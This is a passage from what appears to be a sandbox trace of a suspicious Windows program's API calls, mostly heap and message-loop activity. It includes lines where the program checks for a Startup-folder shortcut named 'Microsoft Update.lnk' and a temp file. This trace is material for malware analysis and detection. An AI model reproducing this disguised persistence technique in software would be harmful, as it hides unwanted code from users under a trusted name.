hHeap=0x2af0000) returned 1 [0248.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0248.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0248.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0248.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0248.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0248.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0248.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0248.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0248.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0248.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0248.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0248.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0248.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0248.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0248.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0248.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0248.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0248.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0248.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0248.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x38658e0 | out: hHeap=0x2af0000) returned 1 [0248.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0248.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0248.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0248.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0248.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0248.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0248.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0248.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0248.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0248.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0248.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0248.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0248.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0248.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0248.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0248.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0248.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0248.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0248.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0248.804] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0248.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0248.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0248.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0248.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0248.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0248.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0248.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0248.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0248.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0248.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0248.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0248.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0248.805] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0248.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0248.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0248.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab5a8 [0248.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0248.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0248.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab488 [0248.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0248.805] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8cf298 | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0248.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0248.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a683a8 [0248.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0248.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0248.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0248.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0248.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0248.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0248.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0248.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0248.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0248.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0248.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0248.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0248.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fa0 [0248.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0248.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x190) returned 0x50e0048 [0248.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0248.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0248.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fa0 | out: hHeap=0x2af0000) returned 1 [0248.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0248.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0248.808] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0x20 [0248.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e0048 | out: hHeap=0x2af0000) returned 1 [0248.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0248.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0248.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0248.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0248.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0248.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0248.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0248.892] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0248.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0248.892] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0248.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0248.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0248.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0248.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0248.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0248.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0248.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0248.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0248.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0248.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0248.893] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0248.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0248.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0248.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0248.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0248.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0248.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0248.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0248.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0248.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0248.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0248.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0248.894] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0248.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0248.894] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf298 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0248.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0248.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0248.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0248.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0248.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0248.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0248.895] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8")) returned 0x20 [0248.895] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0248.895] timeGetTime () returned 0x117e19c [0248.895] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0248.895] Sleep (dwMilliseconds=0xa) [0248.934] timeGetTime () returned 0x117e1cb [0248.934] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0248.934] Sleep (dwMilliseconds=0xa) [0248.984] timeGetTime () returned 0x117e1fa [0248.984] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0248.984] TranslateMessage (lpMsg=0x8cf798) returned 0 [0248.984] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0248.984] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0248.984] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0248.984] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0248.984] Sleep (dwMilliseconds=0xa) [0249.021] timeGetTime () returned 0x117e219 [0249.021] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0249.021] Sleep (dwMilliseconds=0xa) [0249.063] timeGetTime () returned 0x117e248 [0249.063] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0249.063] Sleep (dwMilliseconds=0xa) [0249.106] timeGetTime () returned 0x117e277 [0249.106] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0249.106] Sleep (dwMilliseconds=0xa) [0249.122] timeGetTime () returned 0x117e287 [0249.122] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0249.122] Sleep (dwMilliseconds=0xa) [0249.152] timeGetTime () returned 0x117e2a1 [0249.152] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0249.152] Sleep (dwMilliseconds=0xa) [0249.198] timeGetTime () returned 0x117e2c5 [0249.198] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0249.198] Sleep (dwMilliseconds=0xa) [0249.216] timeGetTime () returned 0x117e2e5 [0249.216] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0249.216] Sleep (dwMilliseconds=0xa) [0249.231] timeGetTime () returned 0x117e2f4 [0249.231] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0249.231] Sleep (dwMilliseconds=0xa) [0249.247] timeGetTime () returned 0x117e304 [0249.247] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0249.247] Sleep (dwMilliseconds=0xa) [0249.289] timeGetTime () returned 0x117e323 [0249.289] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0249.289] Sleep (dwMilliseconds=0xa) [0249.311] timeGetTime () returned 0x117e342 [0249.311] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0249.311] Sleep (dwMilliseconds=0xa) [0249.325] timeGetTime () returned 0x117e352 [0249.325] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0249.325] Sleep (dwMilliseconds=0xa) [0249.385] timeGetTime () returned 0x117e381 [0249.385] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0249.385] Sleep (dwMilliseconds=0xa) [0249.404] timeGetTime () returned 0x117e3a0 [0249.404] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0249.404] Sleep (dwMilliseconds=0xa) [0249.419] timeGetTime () returned 0x117e3b0 [0249.419] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0249.419] Sleep (dwMilliseconds=0xa) [0249.452] timeGetTime () returned 0x117e3cf [0249.452] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0249.452] Sleep (dwMilliseconds=0xa) [0249.467] timeGetTime () returned 0x117e3df [0249.467] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0249.467] Sleep (dwMilliseconds=0xa) [0249.481] timeGetTime () returned 0x117e3ee [0249.481] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0249.481] Sleep (dwMilliseconds=0xa) [0249.497] timeGetTime () returned 0x117e3fe [0249.497] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0249.497] Sleep (dwMilliseconds=0xa) [0249.512] timeGetTime () returned 0x117e40d [0249.513] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0249.513] Sleep (dwMilliseconds=0xa) [0249.528] timeGetTime () returned 0x117e41d [0249.528] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0249.528] Sleep (dwMilliseconds=0xa) [0249.551] timeGetTime () returned 0x117e42d [0249.551] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0249.551] Sleep (dwMilliseconds=0xa) [0249.575] timeGetTime () returned 0x117e44c [0249.575] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0249.575] Sleep (dwMilliseconds=0xa) [0249.601] timeGetTime () returned 0x117e45c [0249.601] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0249.601] Sleep (dwMilliseconds=0xa) [0249.622] timeGetTime () returned 0x117e47b [0249.622] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0249.622] Sleep (dwMilliseconds=0xa) [0249.639] timeGetTime () returned 0x117e48a [0249.639] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0249.639] Sleep (dwMilliseconds=0xa) [0249.655] timeGetTime () returned 0x117e49c [0249.655] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0249.655] Sleep (dwMilliseconds=0xa) [0249.685] timeGetTime () returned 0x117e4b9 [0249.685] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0249.685] Sleep (dwMilliseconds=0xa) [0249.700] timeGetTime () returned 0x117e4c9 [0249.700] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0249.700] Sleep (dwMilliseconds=0xa) [0249.716] timeGetTime () returned 0x117e4d9 [0249.716] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0249.716] Sleep (dwMilliseconds=0xa) [0249.731] timeGetTime () returned 0x117e4e8 [0249.731] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0249.731] TranslateMessage (lpMsg=0x8cf798) returned 0 [0249.731] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0249.731] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0249.732] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0249.732] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0249.732] Sleep (dwMilliseconds=0xa) [0249.747] timeGetTime () returned 0x117e4f8 [0249.747] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0249.747] Sleep (dwMilliseconds=0xa) [0249.762] timeGetTime () returned 0x117e507 [0249.762] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0249.762] Sleep (dwMilliseconds=0xa) [0249.778] timeGetTime () returned 0x117e517 [0249.778] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0249.778] Sleep (dwMilliseconds=0xa) [0249.794] timeGetTime () returned 0x117e527 [0249.794] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0249.794] Sleep (dwMilliseconds=0xa) [0249.809] timeGetTime () returned 0x117e536 [0249.809] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0249.809] Sleep (dwMilliseconds=0xa) [0249.825] timeGetTime () returned 0x117e546 [0249.825] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, 